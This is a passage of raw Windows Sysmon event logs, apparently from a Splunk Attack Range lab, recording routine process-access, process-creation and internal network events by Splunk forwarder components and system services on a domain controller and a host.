11:11:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220568Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220567Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:51.227{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1677-6216-F204-000000003902}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220566Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:51.227{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1677-6216-F204-000000003902}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220565Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:51.229{4F8D34B0-1677-6216-F204-000000003902}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220580Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:52.837{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C19825541FFD5BB229B36FE1AEABC49C,SHA256=B8648355C5D5665688BFB12C5E6CF918E9FFD5692FAA109569DDC79B6C6880C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:52.876{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79573852B08029C7253AEE3799B70DAC,SHA256=208D916FDFC88CADD289152828E22A8519BC93E23E8742E0BFA78376F1ABADFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220579Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:52.243{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=52190F86AF6FFE2E2853436FB1F9A3D4,SHA256=5DA0A6DBDDADD1F276A64D8898820D11BDD2EF20C64B9EF587E781B323C19485,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220581Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:53.852{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36B99764F238DA19E34CB11DD5AE92B3,SHA256=212D76B75E6B006DEAB7DBEC9B02C23D41A3EBADADB28BAD1015244702CA282D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:53.876{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDAA4C2FAC6B5A0FA338E880482C74F9,SHA256=6FFF8692BDA337F520295B3BDB1A91D19D67653CD783CA5E9066A28F62408ADF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220582Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:54.868{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5CA2FAF43A7453C1C5D3145A25563FB,SHA256=D0E72C4696377C396695CEA1C7617D791E68216FE3829C5A1ADBE02D2CAD6487,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:54.891{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A24639563F5DB227CE6C0ECC2B6D5B9,SHA256=243312156403EDF125DF53F5579B995114EA5FB1F25C704EE1F49B6EE7CDD6BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:54.507{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D1548FA36E2B9DE2F392314EEF342D51,SHA256=7C20286B730422F61514CE5F8583C3E8F23EF4F5FBF5209C9DE51C7BA2328220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:54.507{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8AD0E12D16BBEC3BA2C121AD34282FF6,SHA256=59215C3DFEA7E71E9E1DB74CEB01DE2D1CFB1F64D79FC0BE164DB6F8BDDBC04C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:55.922{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F19A6CB25141CF8EFA10DA40AC4A363,SHA256=5BE9909FBB07F16B8A04E430DE701BE68F08C57FEA392055478E2C89F8808036,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220583Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:55.884{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F51FDBFBB564F4C26FB5672A550D6CD0,SHA256=8E41CD3F8DF680CFB00F01CE02498D7006BCFA8C876EF9CF6AD388857D68CA1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:56.941{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DEFB1C7AC82E00A061846835B858CA2,SHA256=37C60CC0BAB203A1247E9F6C7A61FE0DBBC1BF9CA467E69EA05B6DEC010F6CB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220585Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:56.899{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D73CD30555C1B5AADCAEDA20E9203BC1,SHA256=F07B351A17FCA2218E41803B0BC62D4F24995CC0075F5DBD343F96704F7A6192,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:54.611{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49356-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000220584Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:53.584{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51590-false10.0.1.12-8000- 23542300x8000000000000000296533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:57.973{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5F31D799628D030B573274EFF38229B,SHA256=BA491B1C7C987B6D1522D1A9CBE97DA0D8DD9EDDC69A79E3545BBBD4713D5B84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220586Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:57.915{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D00B50ED4CD0F338CF417FE9E646C746,SHA256=5B3E390776DDE692BEFD7C7FD61590AFFC50ADB68D452B69DF183E239C6558F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220587Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:58.930{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BD736C54DCD3B7E889CC85A73454A9A,SHA256=832609E9AF24270F4F02EE5BE1724322C3F6B9120F08AE207842450922076B73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220588Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:59.946{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD45CDCBDCDC3E0EBEFF9284F416B600,SHA256=015F8A184BC921B33C9A58C15578F08FA4BCE4BD7D5BC2E5762A7F341FEED9E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:59.003{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E17025A73E7D95908195B191B1C4012D,SHA256=3918722315179E9BC7F7EC38E7D006A49B9A4FA82D5001BBFD21C9D8D19BC5CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220589Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:00.946{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1A440D2E265E7846E536C59B3629161,SHA256=7545587904CDE57D4732D4C80138F9D367F8FA15DEF2E997273726EEF7438F5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:00.018{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB582173AFB588FC8CB1677125216ACD,SHA256=AE621CA2FEC1DB26BCA767C76685F8F411C3DDBA749F77B1DA22B6FA179E0875,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220591Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:01.962{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FC4279A5AF5B42BE50C548A54FAED85,SHA256=8EA0C92718E8FA89B5F4448C2CCF31509198BF99D2ED49632C44CFAD304C4115,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:01.570{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1681-6216-FC06-000000003802}6952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:01.570{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:01.570{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:01.570{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:01.570{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:01.570{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1681-6216-FC06-000000003802}6952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:01.570{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1681-6216-FC06-000000003802}6952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:01.572{C8EA50B7-1681-6216-FC06-000000003802}6952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:01.037{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3F65E05AF5560B7A3A0D876B6605BA4,SHA256=5407DA0E6A1C18B3C4DCD3C166DC44B9A5E483363305DCA3EC4486EB5DC76C12,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220590Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:58.677{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51591-false10.0.1.12-8000- 23542300x8000000000000000220592Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:02.993{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29B9EC34D3F462853E5E9870F716EDFD,SHA256=3A6B30D8DF3950161DCD876176E881419638434D211F79C9814A9F47CB8FFC95,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:02.568{C8EA50B7-1682-6216-FD06-000000003802}31166832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program 